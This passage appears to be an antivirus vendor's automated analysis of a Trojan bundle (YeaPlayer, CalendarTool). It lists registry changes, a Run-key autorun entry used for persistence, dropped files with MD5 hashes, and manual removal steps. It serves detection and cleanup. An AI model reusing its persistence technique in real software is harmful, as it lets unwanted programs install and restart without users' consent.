"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "11665867"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"CtrlBitMap" = "00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 F0 57 68 43 87 DA 97 3C 50 9C 21 7B C7 3B 8D"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"LastTime" = "DD 07 02 00 04 00 0E 00 00 00 37 00 2F 00 4E 00"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level"
The process CalendarServ.exe:3156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 14 96 58 67 41 95 FE A7 81 FB 51 2E 1E 13 10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 45 65 90 9A E8 C2 71 59 26 A1 F2 1D 50 4D F2"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level"
The process %original file name%.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 8C 0D 80 C2 D3 53 35 30 EA 5C ED D1 F0 F7 60"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The process rundll32.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3E 9C E2 0A 29 4F 57 B5 73 9E 76 B4 F6 BB DF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880" = "Internet Explorer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"
The process setup.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D7 F5 33 3D DF 65 5C AB A2 6D 5A AF 6D C0 7B"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"
The process setup.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D2 CB 94 B8 DC 70 D4 E9 9C 81 6D C4 B7 FD 52"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\YeaInstaller]
"TmN" = "51486"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process Calendar.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 0F BF 8E E9 62 87 0D FD B2 6B B4 CC 3F 9B CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process 291734.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 E9 B4 94 AC 7E 2F E5 91 4F E3 E6 87 51 84 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\DtsEncodeTools]
"{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}" = "{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
41079c5f52bdaae924b668f58848f7ea | c:\Documents and Settings\"%CurrentUserName%"\Application Data\YeaPlayer_br_IBD_Bundle.exe |
41079c5f52bdaae924b668f58848f7ea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe |
9202f096accb0e5dabc4de57365a1bf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\setup.exe |
d847ccf62c349453393ec8042ffddd95 | c:\Program Files\CalendarTool\2.0.0.11189\CalendarEntry.dll |
63bbff06febbdf113c94c426396430c8 | c:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe |
598c72aba0b2afc46f1b85b8ffa003e3 | c:\Program Files\CalendarTool\2.0.0.11189\CrashReport.exe |
4a42c7920e2c2978d862544832b967ab | c:\Program Files\CalendarTool\2.0.0.11189\CrashUL.exe |
a5a91a90602dc58562c8c311e1e8b019 | c:\Program Files\CalendarTool\2.0.0.11189\EVPDR.dll |
326fa0636ae763210d7d6e2cc5619be8 | c:\Program Files\CalendarTool\2.0.0.11189\EVPHelp.dll |
2064fea63e5501e2cde3af77de07e1ab | c:\Program Files\CalendarTool\2.0.0.11189\EVPKernel.dll |
6aa6f72365d13397f8d9e6cb5e8707fd | c:\Program Files\CalendarTool\2.0.0.11189\EVPNet.dll |
73e5bd50fd3af7a7a24a73bf279282f0 | c:\Program Files\CalendarTool\2.0.0.11189\EVPTask.dll |
4cfc9da8e06cdf64e411759b6eb82ab8 | c:\Program Files\CalendarTool\2.0.0.11189\InstallHelper.exe |
b8f50f062002e67901b134ae536907e9 | c:\Program Files\CalendarTool\2.0.0.11189\Report.exe |
c56db1a95947290eedea6fb6b7b5267a | c:\Program Files\CalendarTool\2.0.0.11189\calendar.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
